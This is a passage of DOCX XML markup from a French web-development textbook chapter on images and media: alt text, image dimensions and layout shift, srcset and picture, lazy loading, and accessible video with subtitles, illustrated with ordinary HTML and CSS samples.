              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Décrit la destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Retour à l'accueil »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="217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Image complexe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Résumé court + description longue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Voir ci-dessous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Logo accompagné du nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaîne vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le texte voisin suffit</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LES MAUVAIS `ALT`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt="image"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt="photo"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : n'apportent aucune information.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Recopier le nom du fichier : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt="IMG_2043.jpg"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> identique pour toutes les images d'une galerie.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Oublier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur une image-lien : le lien devient sans nom.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pour un graphique complexe, l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donne la conclusion et une description longue — tableau de données, paragraphe — porte le détail :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une image complexe, résumée puis détaillée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&lt;figure&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src="graphique-ventes.svg"</w:t>
        <w:br/>
        <w:t xml:space="preserve">       alt="Ventes trimestrielles : progression de 12 % entre 2025 et 2026."</w:t>
        <w:br/>
        <w:t xml:space="preserve">       width="800" height="450"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;figcaption&gt;Ventes 2025-2026 (source : service commercial).&lt;/figcaption&gt;</w:t>
        <w:br/>
        <w:t>&lt;/figure&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;details&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;summary&gt;Voir les données du graphique&lt;/summary&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;table&gt;...&lt;/table&gt;</w:t>
        <w:br/>
        <w:t>&lt;/details&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Dimensions, réserve d'espace et décalage de mise en page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Indiquer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet au navigateur de réserver l'espace avant le chargement. Sans ces attributs, le contenu saute au moment où l'image arrive : c'est le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>décalage cumulatif de mise en page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CLS), un des indicateurs de qualité d'expérience mesurés par Google.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f10.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.10 — Sans dimensions, la page saute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un redimensionnement sûr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L'image s'adapte sans déformer et sans dépasser son conteneur */</w:t>
        <w:br/>
        <w:t>img {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-width: 100%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  height: auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aspect-ratio: attr(width) / attr(height);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> expriment des proportions, pas une taille finale imposée en CSS. Les écrire en pixels d'origine permet au navigateur de calculer le rapport et de réserver la bonne hauteur, quelle que soit la largeur finale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Réponses adaptatives : srcset et picture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un téléphone n'a pas besoin d'une image de 2400 pixels. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique plusieurs versions et laisse le navigateur choisir selon la largeur d'affichage et la densité de l'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre versions, une seule balise : le navigateur choisit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&lt;img src="images/hero-800.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     srcset="images/hero-480.webp   480w,</w:t>
        <w:br/>
        <w:t xml:space="preserve">             images/hero-800.webp   800w,</w:t>
        <w:br/>
        <w:t xml:space="preserve">             images/hero-1200.webp 1200w,</w:t>
        <w:br/>
        <w:t xml:space="preserve">             images/hero-1600.webp 1600w"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     sizes="(max-width: 600px) 100vw,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            (max-width: 1200px) 50vw,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            800px"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     alt="Atelier de formation, vue d'ensemble"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     width="1600" height="900" loading="lazy"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit la largeur d'affichage prévue ; le navigateur croise cette information avec la densité de l'écran et choisit le fichier le plus léger qui reste net. Aucun JavaScript n'est nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>picture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> va plus loin : il permet de servir un format différent selon le support, ou une image recadrée différemment selon l'orientation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux usages de `picture` : format et cadrage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&lt;picture&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;source type="image/avif" srcset="hero.avif"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;source type="image/webp" srcset="hero.webp"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src="hero.jpg" alt="Atelier de formation, vue d'ensemble"</w:t>
        <w:br/>
        <w:t xml:space="preserve">       width="1600" height="900"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/picture&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;picture&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;source media="(min-width: 900px)" srcset="paysage-large.webp"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src="paysage-carre.webp" alt="Vallée au lever du jour"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/picture&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Précharger l'image principale sans bloquer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&lt;link rel="preload" as="image" href="hero.avif"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      imagesrcset="hero-800.avif 800w, hero-1600.avif 1600w"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      imagesizes="100vw"&gt;</w:t>
      </w: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LE CHARGEMENT PARESSEUX</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>loading="lazy"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> retarde le chargement des images situées hors écran. Ne l'appliquez jamais à l'image principale : elle retarderait le rendu. Sur une page d'articles, en revanche, c'est un gain immédiat.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.5 Vidéo et audio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les éléments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplacent les plugins depuis HTML5. Ils acceptent plusieurs sources ; le navigateur choisit la première qu'il sait lire. Sans sous-titres, une vidéo reste inaccessible à une partie du public — et souvent illisible en environnement bruyant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une vidéo accessible, avec repli et sous-titres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&lt;figure&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;video controls width="960" height="540" poster="apercu.webp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">         preload="metadata" playsinline&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;source src="demo.webm" type="video/webm"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;source src="demo.mp4"  type="video/mp4"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;track kind="subtitles" src="sous-titres/fr.vtt"</w:t>
        <w:br/>
        <w:t xml:space="preserve">           srclang="fr" label="Français" default&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p&gt;Votre navigateur ne prend pas en charge la vidéo.</w:t>
        <w:br/>
        <w:t xml:space="preserve">       &lt;a href="demo.mp4"&gt;Télécharger la vidéo&lt;/a&gt;.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/video&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;figcaption&gt;Démonstration de l'éditeur de code (2 min 14).&lt;/figcaption&gt;</w:t>
        <w:br/>
        <w:t>&lt;/figure&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.21 — Sept attributs des médias et leur usage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186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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1865"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
